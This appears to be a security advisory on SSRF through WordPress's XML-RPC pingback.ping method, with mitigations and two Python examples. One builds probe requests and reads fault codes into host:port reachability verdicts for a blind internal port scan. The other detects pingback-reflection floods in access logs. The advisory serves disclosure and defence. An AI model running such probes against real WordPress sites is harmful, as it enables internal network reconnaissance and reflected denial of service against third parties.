H3-2026-0042

WordPress XML-RPC Pingback Server-Side Request Forgery Vulnerability

Category VULNERABILITY
Base Score 5.8

Description

The WordPress XML-RPC interface (xmlrpc.php, enabled by default) exposes the pingback.ping method, which takes a sourceURI and a targetURI. To verify the pingback, WordPress issues a server-side HTTP GET to the sourceURI and checks that the fetched page links to the targetURI. The targetURI must be a pingback-enabled post on the site, but the sourceURI is entirely attacker-controlled, so a crafted pingback.ping request forces the WordPress server to request an arbitrary URL, including hosts on its internal network, from its own vantage point. This is a server-side request forgery. The fetched content is not returned to the caller, but the XML-RPC fault code distinguishes a failed fetch from a successful fetch that lacked the expected link, which is enough to turn the server into a blind port scanner.
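The following is an added example for this advisory, not code from the advisory or from WordPress. It builds the pingback.ping request body and triages the server's reply into a reachability verdict for the probed sourceURI; the fault codes are those WordPress emits from its pingback handler (class-wp-xmlrpc-server.php). It does no network I/O, so the sample responses are constructed locally; a real probe would POST the request body to /xmlrpc.php with Content-Type text/xml, against a target you are authorised to test.

```python
"""pingback.ping SSRF probe: request construction and response triage.

Added example for the advisory above, not code from the advisory or WordPress.
No network I/O is performed here; send build_pingback_request() as a POST to
/xmlrpc.php and feed the reply to probe_verdict().
"""
import xmlrpc.client

# Fault codes WordPress raises from pingback.ping (pingback_error() calls).
PINGBACK_FAULTS = {
    0: "source fetched but it does not link to the target (or source == target)",
    16: "source URL does not exist (fetch failed, refused, or blocked by URL validation)",
    17: "source fetched but contains no link to the target",
    32: "target URL does not exist",
    33: "target is not a pingback-enabled post on this site",
    48: "pingback already registered for this source/target pair",
    49: "access denied",
}


def build_pingback_request(source_uri: str, target_uri: str) -> bytes:
    """Body for POST /xmlrpc.php. WordPress GETs source_uri before inspecting
    its content, which is the SSRF primitive; target_uri must be a real post."""
    xml = xmlrpc.client.dumps((source_uri, target_uri), methodname="pingback.ping")
    return xml.encode("utf-8")


def probe_verdict(response_body: bytes) -> tuple[str, str]:
    """Turn the XML-RPC reply into (verdict, detail).

    'reachable'   : WordPress fetched source_uri (fault 0/17, or success), so
                    that host:port answered HTTP from the server's network.
    'unreachable' : fault 16; closed port, non-HTTP service, DNS failure, or
                    the address was rejected by WordPress's URL validation.
    'target-error': the probe never ran because target_uri was not a valid post.
    """
    try:
        params, _method = xmlrpc.client.loads(response_body)
    except xmlrpc.client.Fault as fault:
        detail = PINGBACK_FAULTS.get(fault.faultCode, fault.faultString)
        if fault.faultCode in (0, 17):
            return "reachable", detail
        if fault.faultCode == 16:
            return "unreachable", detail
        if fault.faultCode in (32, 33, 48):
            return "target-error", detail
        return "unknown", f"faultCode {fault.faultCode}: {fault.faultString}"
    # No fault: the source was fetched, linked to the target, and was registered.
    return "reachable", str(params[0])


def constructed_fault(code: int, text: str) -> bytes:
    """Constructed sample of a fault reply from /xmlrpc.php (demo input only)."""
    return xmlrpc.client.dumps(xmlrpc.client.Fault(code, text), methodresponse=True).encode()


def constructed_success(text: str) -> bytes:
    """Constructed sample of a successful pingback registration (demo input only)."""
    return xmlrpc.client.dumps((text,), methodresponse=True).encode()


if __name__ == "__main__":
    # Constructed URLs: an internal service as the source, a real post as the target.
    req = build_pingback_request("http://10.0.0.5:8080/", "https://blog.example/?p=1")
    print(req.decode())
    for code, text in [(16, "The source URL does not exist."),
                       (17, "The source URL does not contain a link to the target URL.")]:
        print(code, probe_verdict(constructed_fault(code, text)))
```

Probing a range of host:port pairs as the sourceURI and comparing verdicts (and response times, since a filtered port times out while a refused one fails immediately) is how the blind scan is carried out; the target post is fixed throughout.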

Impact

An attacker can use the WordPress server as a request proxy: by varying the sourceURI and observing the fault code and response time, the attacker can scan the server's internal network, confirm which internal services answer HTTP, and reach services that are not exposed to the internet. Data exfiltration is limited to what can be inferred from those signals, since the fetched content is never returned. The same mechanism supports reflected distributed denial of service: many WordPress sites can be made to request a third party's URL on the attacker's behalf, each fetch identified only by a WordPress User-Agent. Since WordPress 3.5.1 the pingback fetch is validated by wp_http_validate_url(), which rejects loopback and RFC 1918 addresses unless a site explicitly allows them via the http_request_host_is_external filter, so internal scanning mostly affects older or deliberately relaxed installations; the reflection abuse is unaffected by that check. Sites that do not need pingbacks can remove the method with the xmlrpc_methods filter or block xmlrpc.php at the web server.
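As an added example for this advisory (not code from the advisory or from WordPress), the script below shows how a flooded third party recognises pingback reflection in its own access log. When WordPress verifies a pingback it fetches the claimed source with the User-Agent "WordPress/<version>; <blog URL>; verifying pingback from <ip>", where <ip> is the TCP peer that submitted pingback.ping. Parsing that string out of combined-format log lines yields both the list of reflecting WordPress hosts and the address that drove them (which may itself be a proxy). The log lines are constructed, not captured traffic.

```python
"""Detect pingback-reflected traffic in a victim's web server access log.

Added example for the advisory above, not code from the advisory or WordPress.
SAMPLE_LOG is constructed, not real traffic.
"""
import re
from collections import Counter

# Apache/nginx "combined" format:
# client ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# User-Agent WordPress sends while fetching a pingback's sourceURI.
PINGBACK_UA_RE = re.compile(
    r'^WordPress/(?P<version>[^;]+); (?P<blog>\S+); verifying pingback from (?P<origin>\S+)$'
)

# Constructed sample: three WordPress hosts reflecting for one origin, plus a browser hit.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2026:10:00:01 +0000] "GET /?p=1 HTTP/1.1" 200 51234 "-" "WordPress/6.4.3; https://blog-a.example; verifying pingback from 203.0.113.9"
198.51.100.8 - - [01/Mar/2026:10:00:01 +0000] "GET /?p=1 HTTP/1.1" 200 51234 "-" "WordPress/6.3.2; https://blog-b.example; verifying pingback from 203.0.113.9"
198.51.100.7 - - [01/Mar/2026:10:00:02 +0000] "GET /?p=1 HTTP/1.1" 200 51234 "-" "WordPress/6.4.3; https://blog-a.example; verifying pingback from 203.0.113.9"
192.0.2.44 - - [01/Mar/2026:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/124.0"
198.51.100.9 - - [01/Mar/2026:10:00:03 +0000] "GET /?p=1 HTTP/1.1" 200 51234 "-" "WordPress/6.4.3; https://blog-c.example; verifying pingback from 203.0.113.9"
"""


def analyse_pingback_reflection(log_text: str) -> dict:
    """Summarise pingback-verification fetches seen in combined-format log text.

    Returns hit count, the reflecting WordPress hosts (client IPs), the origin
    addresses those hosts report, and the paths being hammered.
    """
    reflectors = Counter()   # WordPress servers doing the fetching
    origins = Counter()      # addresses that submitted pingback.ping to them
    paths = Counter()
    total = 0
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ua = PINGBACK_UA_RE.match(m["ua"])
        if not ua:
            continue  # ordinary traffic
        total += 1
        reflectors[m["client"]] += 1
        origins[ua["origin"]] += 1
        paths[m["path"]] += 1
    return {
        "pingback_hits": total,
        "reflectors": dict(reflectors),
        "origins": dict(origins),
        "paths": dict(paths),
    }


def looks_like_reflection_flood(report: dict, min_reflectors: int = 3) -> bool:
    """Heuristic: several distinct WordPress hosts fetching on behalf of one origin."""
    return len(report["reflectors"]) >= min_reflectors and len(report["origins"]) == 1


if __name__ == "__main__":
    report = analyse_pingback_reflection(SAMPLE_LOG)
    print(report)
    print("reflection flood:", looks_like_reflection_flood(report))
```

Because the reflecting hosts are legitimate sites, blocking them by IP is counterproductive; the User-Agent pattern is the better filter at the edge, and the reported origin address is what to hand to the abuse desk.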

References